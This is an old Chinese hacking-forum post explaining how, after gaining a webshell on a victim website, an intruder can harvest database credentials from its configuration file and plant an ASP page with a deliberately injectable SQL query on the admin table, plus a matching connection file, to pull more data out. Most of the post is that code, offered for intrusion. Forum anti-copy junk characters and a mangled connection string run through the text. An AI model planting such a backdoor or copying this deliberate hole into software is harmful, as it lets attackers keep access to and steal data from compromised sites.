找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1959|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵3 a8 `# B* Y3 V  u! Y# r

; P# F" V8 k* k' ~9 ~1 w& k今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
# B5 m- K% S8 d/ J2 D4 f* u3 o) b3 z  j- M
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
0 Z: |" \; r! a6 N' D
, H3 Z6 q5 A! Z7 |: m; n首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
# `' P" b' ~4 v/ M. ?5 E
1 v0 t% \2 u: P1 k0 E! Q密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表0 e$ x6 o) U7 x8 [) V( B# p+ x
: Z0 R" E. B8 j7 H
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
, G, L' g3 @, R4 A4 W; u
3 _5 w1 E' R! }; a' F4 s( R程序代码9 ?3 C" ^8 F- J" \! c% h. N  N/ T
<!--#include file="xx.asp"-->0 G0 [% O8 B( y! j
<%0 q3 y/ E& }3 k" Z1 K/ U" X# b8 J4 b1 v
set rs=server.createobject("ADODB.recordset")
: h2 {( a+ K+ n" v3 q' R1 K6 jid = request("id")1 U& ?; F# @1 W) r- L5 {) K  ?
strSQL = "select * from admin where id=" & id
4 V: N2 u6 q( [* ^# w, wrs.open strSQL,conn,1,33 K  s4 _6 `# U
rs.close% ?) c0 G6 M8 r( w- c  k
%>
7 \7 q* Q% c  k/ Q# e, _2 K7 Z0 `; U( u% w4 O& _: K
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
1 d9 H9 r9 [2 ^1 D( v
4 }# O0 x3 r0 z' S3 ]" ]; Y' t你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
' K/ _6 f, R* B) E' y
; _9 ~- c0 d6 t/ z然后就要构造一个连接数据库的文件了,代码如下:% b7 y# L4 s: ?! |
程序代码* U2 |7 A; p& o2 r) h# B
<%        9 {5 y1 @: l2 @  s) q
strSQLServerName = "000.000.000.000"     '服务器名称或地址
7 J: I: z5 V0 z; y5 N0 IstrSQLDBUserName = "sqlname"         '数据库帐号
" Q' ]; S7 n0 i+ c  s+ KstrSQLDBPassword = "sqlpass"         '数据库密码* e7 p# y8 c: I$ J6 Q" z# F. E0 |
strSQLDBName = "sqldataname"           '数据库名称0 [/ I3 n7 i0 ^1 g& G
Set conn = Server.CreateObject("ADODB.Connection")
1 [+ h* N8 Z9 `# ^, ]3 _strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"- o) l; q( Z+ j& T! Y: t
conn.open strCon7 e: Z3 S: a8 H
%>! ^6 \" v: d5 U" u! ^9 A* N

' j8 m9 `7 N; k& s5 d0 Z这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
0 v- O  T, `8 h
9 g9 ^6 z2 O" }5 g4 i2 Q8 |5 @就这样,正常情况下,就OK了,伪造成功……
  a( L& u1 b) D' X# c
7 E' W' p, ?! I8 c: z           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表